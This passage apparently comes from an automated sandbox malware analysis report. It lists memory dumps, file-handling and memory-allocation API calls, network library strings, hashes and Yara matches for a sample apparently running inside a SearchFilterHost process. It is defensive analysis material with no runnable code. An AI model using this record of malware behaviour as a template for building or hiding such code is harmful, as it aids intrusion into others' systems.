                                                                                                  • API String ID: 0-4201739200
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $e$k$o
                                                                                                  • API String ID: 0-3624523832
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $e$k$o
                                                                                                  • API String ID: 0-3624523832
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: S,en$ache$en-U$no-c
                                                                                                  • API String ID: 0-1745142266
                                                                                                  • Opcode ID: f5009ae4abfabb7ffefa97652cc27b922532a738bc7b02022a339a7295644c22
                                                                                                  • Instruction ID: 46ac4699d6ae648e1f80b3b555e9a592e5ccde0d10b5edd5d66d25c377a2b0b8
                                                                                                  • Opcode Fuzzy Hash: f5009ae4abfabb7ffefa97652cc27b922532a738bc7b02022a339a7295644c22
                                                                                                  • Instruction Fuzzy Hash: 3BF04F75D0810CFBDB14DFD4E982B9DBB38AB54700F0081E8EE189B641EA716619DBE2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: =$O$ZGTM$[Q\I
                                                                                                  • API String ID: 0-2874482513
                                                                                                  • Opcode ID: 492ed94de9e442fd960b5a945faf94960ba891a37df093a3002e2e6f803537ff
                                                                                                  • Instruction ID: 593f4626c84b16b9551b7e1765ee173444cf510fbc9c22ff5440b3dcf3dd2e17
                                                                                                  • Opcode Fuzzy Hash: 492ed94de9e442fd960b5a945faf94960ba891a37df093a3002e2e6f803537ff
                                                                                                  • Instruction Fuzzy Hash: 88E065B090124C9ADB04DFF499445EEBBB8AB40300F2084A9D919AB241E775AB12C796

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:2.5%
                                                                                                  Dynamic/Decrypted Code Coverage:4.4%
                                                                                                  Signature Coverage:1.6%
                                                                                                  Total number of Nodes:436
                                                                                                  Total number of Limit Nodes:69

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (8$0k$I$J$N$O$V|$[D$`$fx${P
                                                                                                  • API String ID: 0-2758441814
                                                                                                  • Opcode ID: 7cd1060c287b55fb3b41efe73a10322d22aa5cc6aecdf875300a3dc055a4dd12
                                                                                                  • Instruction ID: a27f5bed75465ed30f5cbbddfd6e7376a627e20a6bb79bd6c1e278017e120d37
                                                                                                  • Opcode Fuzzy Hash: 7cd1060c287b55fb3b41efe73a10322d22aa5cc6aecdf875300a3dc055a4dd12
                                                                                                  • Instruction Fuzzy Hash: B0128CB0D16229CBEF24CF44C994BEDBBB2BB44308F1082DAD5096B290D7B56AC5CF55
                                                                                                  APIs
                                                                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 032AC4F4
                                                                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 032AC52F
                                                                                                  • FindClose.KERNELBASE(?), ref: 032AC53A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                                  • String ID:
                                                                                                  • API String ID: 3541575487-0
                                                                                                  • Opcode ID: 9b1775c0694cab9b5ac375888c13b0b91da9880a664cfacdd9c2bf0ef09938c8
                                                                                                  • Instruction ID: 464ab5b680905cb1e7f844190b6eff9aeb798981a47cab92af96831e907ec7fa
                                                                                                  • Opcode Fuzzy Hash: 9b1775c0694cab9b5ac375888c13b0b91da9880a664cfacdd9c2bf0ef09938c8
                                                                                                  • Instruction Fuzzy Hash: BF3192B5920719BBDB20DB64CC85FEF777CAB44744F144498B909BB180DAB0BAC48BA0
                                                                                                  APIs
                                                                                                  • NtCreateFile.NTDLL(A35ADC33,0000006A,?,?,?,?,?,?,?,?,?), ref: 032B9018
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 823142352-0
                                                                                                  • Opcode ID: c801b236e75bb4bc9b37aa594bff612af0ec2f3c0d3abe5d97e1b87ca7553daf
                                                                                                  • Instruction ID: a127aef86997a414de0fd6da5f064bb338331ae67349d6b2c1bd60555966201d
                                                                                                  • Opcode Fuzzy Hash: c801b236e75bb4bc9b37aa594bff612af0ec2f3c0d3abe5d97e1b87ca7553daf
                                                                                                  • Instruction Fuzzy Hash: EA31D3B5A10208AFDB14DF98D880EEEB7F9AF8C314F108209FD19A7340D770A951CBA5
                                                                                                  APIs
                                                                                                  • NtReadFile.NTDLL(A35ADC33,0000006A,?,?,?,?,?,?,?), ref: 032B9160
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 2738559852-0
                                                                                                  • Opcode ID: 2f68a037fb149db10700f6fbf5e475ea70ead0067214abf062199d4d96e50e10
                                                                                                  • Instruction ID: b91603d3a6ba5b393949337c8c64305c22a99b459262b00dad22247ba04d3c95
                                                                                                  • Opcode Fuzzy Hash: 2f68a037fb149db10700f6fbf5e475ea70ead0067214abf062199d4d96e50e10
                                                                                                  • Instruction Fuzzy Hash: 4731C5B9A10208AFDB14DF99D881EEEB7B9AF88714F108109FD19A7240D770A9518BA5
                                                                                                  APIs
                                                                                                  • NtAllocateVirtualMemory.NTDLL(A35ADC33,?,032B7E5F,00000000,00000004,00003000,?,?,?,?,?,032B7E5F,032A1B4E,032A1B4E,00000000,?), ref: 032B9432
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 2167126740-0
                                                                                                  • Opcode ID: e4fc71308b37eb257a6d272c665e276b1514e9313c5a1f372fd8819a6de134d6
                                                                                                  • Instruction ID: a043deed21322c34b241edaa33c9fe503a6f22e2c4e5c14e028ccd27a5e5a515
                                                                                                  • Opcode Fuzzy Hash: e4fc71308b37eb257a6d272c665e276b1514e9313c5a1f372fd8819a6de134d6
                                                                                                  • Instruction Fuzzy Hash: 7421FBB9A10209AFDB14DF59DC81EEFB7B9EF88350F10810AFD18A7240D770A951CBA5
                                                                                                  APIs
                                                                                                  • NtDeleteFile.NTDLL(A35ADC33), ref: 032B9203
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: DeleteFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 4033686569-0
                                                                                                  • Opcode ID: e43d69b4d04ca0b690ebcb19fc35979828dbbe6c1bf827c20973be6f74474864
                                                                                                  • Instruction ID: 1a633cc6cb85f2301eec994176da2ce020ad7fca3f10599992588adc0c4ac1b7
                                                                                                  • Opcode Fuzzy Hash: e43d69b4d04ca0b690ebcb19fc35979828dbbe6c1bf827c20973be6f74474864
                                                                                                  • Instruction Fuzzy Hash: EF119E75A20704BFD620EB68DC41FEBB3BCEF84354F008149F918AB280D7B07A5187A1
                                                                                                  APIs
                                                                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 032B9247
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close
                                                                                                  • String ID:
                                                                                                  • API String ID: 3535843008-0
                                                                                                  • Opcode ID: 8c432eb5109c663c6e388c646d9d9885cabc588ea9dd12fc9b3944e72242aa06
                                                                                                  • Instruction ID: 3a5da2db606fa9618d26bb9ae006effc46b74f8c47513b0b05686199d7c46c06
                                                                                                  • Opcode Fuzzy Hash: 8c432eb5109c663c6e388c646d9d9885cabc588ea9dd12fc9b3944e72242aa06
                                                                                                  • Instruction Fuzzy Hash: EAE0463A200304BBD620EA5ADC40FDB77ACDFCA764F108019FA18AB281D6B1B91186E1
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: a3411ce606e4bd15a7abbda555f5bc2930054268dc7f32a5cb7010aee3d34c30
                                                                                                  • Instruction ID: 485ad035680643a4ba071cc20a329087387643a2c35f1b5550aac81c31d38c5f
                                                                                                  • Opcode Fuzzy Hash: a3411ce606e4bd15a7abbda555f5bc2930054268dc7f32a5cb7010aee3d34c30
                                                                                                  • Instruction Fuzzy Hash: 2790026260150052414071594984406641597F13013D5C159A0555570C871EC9559269
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 5e04e387507bebb67647633aa59e45779bf4880308a8e9cfca71f96e69217bbe
                                                                                                  • Instruction ID: 63d0ff69ac187f660899c05520dc32a5443543a966a7ec017cf2c8b8e4c35c5e
                                                                                                  • Opcode Fuzzy Hash: 5e04e387507bebb67647633aa59e45779bf4880308a8e9cfca71f96e69217bbe
                                                                                                  • Instruction Fuzzy Hash: 0B900222211C0052D20075694D94B07041587E0303F95C159A0155564CCA1BC9615521
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 588fbed16bab80ba13cfa38889e13478ded679fd6e0a732c97ab8a97c919984b
                                                                                                  • Instruction ID: c12390cb7e4da157eb71cadeaededd6bbe6de70f1c4afa47572b8e94ca610911
                                                                                                  • Opcode Fuzzy Hash: 588fbed16bab80ba13cfa38889e13478ded679fd6e0a732c97ab8a97c919984b
                                                                                                  • Instruction Fuzzy Hash: 3790022260140512D10171594584616041A87E0241FD5C066A1025565ECB2BCA92A131
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 9b86f43b76aff5d75af983b7c33d2842930a941ce77e6ec99852034cb8113562
                                                                                                  • Instruction ID: 4c8cca7252e27a4e2eecf393edda936c7b2b7229f9fb16e1e3ca117b793e9282
                                                                                                  • Opcode Fuzzy Hash: 9b86f43b76aff5d75af983b7c33d2842930a941ce77e6ec99852034cb8113562
                                                                                                  • Instruction Fuzzy Hash: C890026220180413D14075594984607041587E0302F95C055A2065565E8B2FCD516135
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 8914f0e8432730cd84d3024264786264cdaa479af299b55c4025f11ea7d1c846
                                                                                                  • Instruction ID: dd027d8a1e9b605389057c9a827e53871c341d8cedfae3b32636b7d55b04c8c2
                                                                                                  • Opcode Fuzzy Hash: 8914f0e8432730cd84d3024264786264cdaa479af299b55c4025f11ea7d1c846
                                                                                                  • Instruction Fuzzy Hash: 9290026220240013410571594594616441A87F0201B95C065E10155A0DC62BC9916125
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 1310d19058ccb9f4e69f69ee0754a3845fa977e447f36b8a482de62a9a8cd41d
                                                                                                  • Instruction ID: 1bf8770910b9a38e8f11ed21b1d902c96a262d8f9d760c4377977ff1a929a6cd
                                                                                                  • Opcode Fuzzy Hash: 1310d19058ccb9f4e69f69ee0754a3845fa977e447f36b8a482de62a9a8cd41d
                                                                                                  • Instruction Fuzzy Hash: 5090023260540812D15071594594746041587E0301F95C055A0025664D875BCB5576A1
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 0cd4ff84db7f8be54ff4fb483daacf22cb224a3cf241a31f76f657097687959c
                                                                                                  • Instruction ID: c2c4d94fc794a9a721a2455998a42d8a82c031e18b4d0ec7043202d67a1f8164
                                                                                                  • Opcode Fuzzy Hash: 0cd4ff84db7f8be54ff4fb483daacf22cb224a3cf241a31f76f657097687959c
                                                                                                  • Instruction Fuzzy Hash: 6890023220140812D1807159458464A041587E1301FD5C059A0026664DCB1BCB5977A1
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 81eab33023e6e695c6f552521e2c04bbcf48bab6819493ab1f2d5be3b869e9e1
                                                                                                  • Instruction ID: db330dd607b63b528b2ff530edf059278ffe55ca6f5aab01a664016fe35f32fc
                                                                                                  • Opcode Fuzzy Hash: 81eab33023e6e695c6f552521e2c04bbcf48bab6819493ab1f2d5be3b869e9e1
                                                                                                  • Instruction Fuzzy Hash: B190023220544852D14071594584A46042587E0305F95C055A00656A4D972BCE55B661
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: f6851f4ac88f4af2767560f8ac26d9718fcdbaca9b68433dd67f699377499acf
                                                                                                  • Instruction ID: 8364115c16619ea2d1661003e1c194d5dbd15a9d3727361b40412e5d0c44c1c6
                                                                                                  • Opcode Fuzzy Hash: f6851f4ac88f4af2767560f8ac26d9718fcdbaca9b68433dd67f699377499acf
                                                                                                  • Instruction Fuzzy Hash: 6F900226211400130105B5590784507045687E5351395C065F1016560CD727C9615121
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: b19ab3c461b9c99f7edde8b3ab3b785c92b77d6676fb46411e11c31530cbce6c
                                                                                                  • Instruction ID: b51b84774d2bd6fed7f33255909b47d9eabe8f2f0c06fba004203f161771dec9
                                                                                                  • Opcode Fuzzy Hash: b19ab3c461b9c99f7edde8b3ab3b785c92b77d6676fb46411e11c31530cbce6c
                                                                                                  • Instruction Fuzzy Hash: B2900226221400120145B559078450B085597E63513D5C059F14175A0CC727C9655321
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 0896a68049917beaacb61e60703ba29e4b7acfdb780eef3f6a0e0e4f1fae2359
                                                                                                  • Instruction ID: 0e996669cfcae65df5ae798d6d5d6924498c132a68a1dbf0fbad8eecf1ab201e
                                                                                                  • Opcode Fuzzy Hash: 0896a68049917beaacb61e60703ba29e4b7acfdb780eef3f6a0e0e4f1fae2359
                                                                                                  • Instruction Fuzzy Hash: 7290023260550412D10071594694706141587E0201FA5C455A0425578D879BCA5165A2
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 5e8fb4d1e5c5916e2c4e20a25afa62c1c865936b5235142be9ed64387f444465
                                                                                                  • Instruction ID: 177d5d12b550bc2caeb5dadc1d09671ba82b2e20e8e245953c7cc5306124fffc
                                                                                                  • Opcode Fuzzy Hash: 5e8fb4d1e5c5916e2c4e20a25afa62c1c865936b5235142be9ed64387f444465
                                                                                                  • Instruction Fuzzy Hash: AC90022224545112D150715D45846164415A7F0201F95C065A08155A4D865BC9556221

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (8$0k$I$J$N$O$V|$[D$`$fx${P
                                                                                                  • API String ID: 0-2758441814
                                                                                                  • Opcode ID: 89a73bc24ddb0cccf76578158963c40af07d6fa1de818f6ba867e7dd186c7847
                                                                                                  • Instruction ID: f184f5531e816bd3d4f866f10b50f34a69e892418526ca70477682402f99c967
                                                                                                  • Opcode Fuzzy Hash: 89a73bc24ddb0cccf76578158963c40af07d6fa1de818f6ba867e7dd186c7847
                                                                                                  • Instruction Fuzzy Hash: 6D818EB0D05269CBEB24CF45C998BDEBBB5BB44308F1081D9D5487B281D7BA1A89CF94
                                                                                                  APIs
                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 032B3A0B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sleep
                                                                                                  • String ID: net.dll$wininet.dll
                                                                                                  • API String ID: 3472027048-1269752229
                                                                                                  • Opcode ID: bf38b0a3e16a0e536b869da28dbb8a37be52a20edd91654170277ad0a209da0b
                                                                                                  • Instruction ID: 7aaaf833f7611938dc9f8f3490fb4b5ee01b692660fcdea7c06fd20bdaee70b1
                                                                                                  • Opcode Fuzzy Hash: bf38b0a3e16a0e536b869da28dbb8a37be52a20edd91654170277ad0a209da0b
                                                                                                  • Instruction Fuzzy Hash: 09318EB5A01305BFD714DFA4C880FEBBBB8EB88744F544558E6196B240D7B0B684CBE1
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InitializeUninitialize
                                                                                                  • String ID: @J7<
                                                                                                  • API String ID: 3442037557-2016760708
                                                                                                  • Opcode ID: 84330b08b2e41f8a80fbae7783b7e1abb65d82335471f4ed81a8e7afdbd13ec8
                                                                                                  • Instruction ID: b7dd5b5a130b1596b7cb7cf0f033bad223b9db64793b31e442d6b5a07cafac13
                                                                                                  • Opcode Fuzzy Hash: 84330b08b2e41f8a80fbae7783b7e1abb65d82335471f4ed81a8e7afdbd13ec8
                                                                                                  • Instruction Fuzzy Hash: 4D311EB6A1060AAFDB00DFD8DC809EEB7B9FF88304B148559E505EB314D775EE458BA0
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
